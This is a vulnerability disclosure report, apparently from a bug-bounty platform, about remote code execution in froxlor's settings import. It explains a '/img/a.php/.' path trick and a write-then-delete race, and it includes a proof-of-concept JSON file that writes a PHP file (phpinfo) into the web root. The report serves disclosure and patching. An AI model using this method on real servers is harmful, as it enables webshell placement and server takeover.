Remote Code Execution Vulnerability Through Unrestrict File Write in froxlor/froxlor
Reported on
Mar 4th 2023
Description
In the import setting function, in the file Froxlor\lib\Froxlor\SImExporter.php
file_put_contents($img_filename, $img_data);
if (function_exists('finfo_open')) {
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mimetype = finfo_file($finfo, $img_filename);
finfo_close($finfo);
} else {
$mimetype = mime_content_type($img_filename);
}
if (empty($mimetype)) {
$mimetype = 'application/octet-stream';
}
if (!in_array($mimetype, ['image/jpeg', 'image/jpg', 'image/png', 'image/gif'])) {
@unlink($img_filename);
throw new Exception("Uploaded file is not a valid image");
}
$spl = explode('.', $img_filename);
$file_extension = strtolower(array_pop($spl));
unset($spl);
if (!in_array($file_extension, [
'jpeg',
'jpg',
'png',
'gif'
])) {
@unlink($img_filename);
throw new Exception("Invalid file-extension, use one of: jpeg, jpg, png, gif");
}
the code first writes the data provided by the user to the file path provided by the user
And then verifies the file extension. If failed, it will delete that file through unlink function.
Unfortunately, there is a small trick between the file_put_content and unlink functions. If we set the file path to /img/a.php/., the file_put_content function can save the file in /img/a.php, but the unlink function cannot delete /img/a.php.
Proof of Concept
So, here are our proof of concept.
{
"panel.version": "2.0.13",
"panel.db_version": "202302030",
"_sha": "bd48ad3bab8de5e10cd3e7882c19dd9457145d3d",
"a.b.image_data": "R0lGODlhCjw/cGhwIHBocGluZm8oKTs=",
"a.b": "/img/a.php/."
}
If we import this file in the settings panel, it will write the content of <?php phpinfo(); into img/a.php in the webserver.
attack video: https://drive.google.com/file/d/19ScE3oZ_G1VBk124QU35--cbQZ9T1Z4e/view?usp=sharing
Also, it's worth noting that we can still exploit this vulnerability if there are no tricks for the unlink function. Because the code first writes the file and then deletes it, the time gap is enough for us to access our webshell through multi-threading. Hope this gets noticed when it's fixed.
Impact
This vulnerability can be exploited to cause a Remote Code Execution on target web server.
Occurrences
References
If possible, can the vulnerability go public as early as possible? I really need the CVE, please!
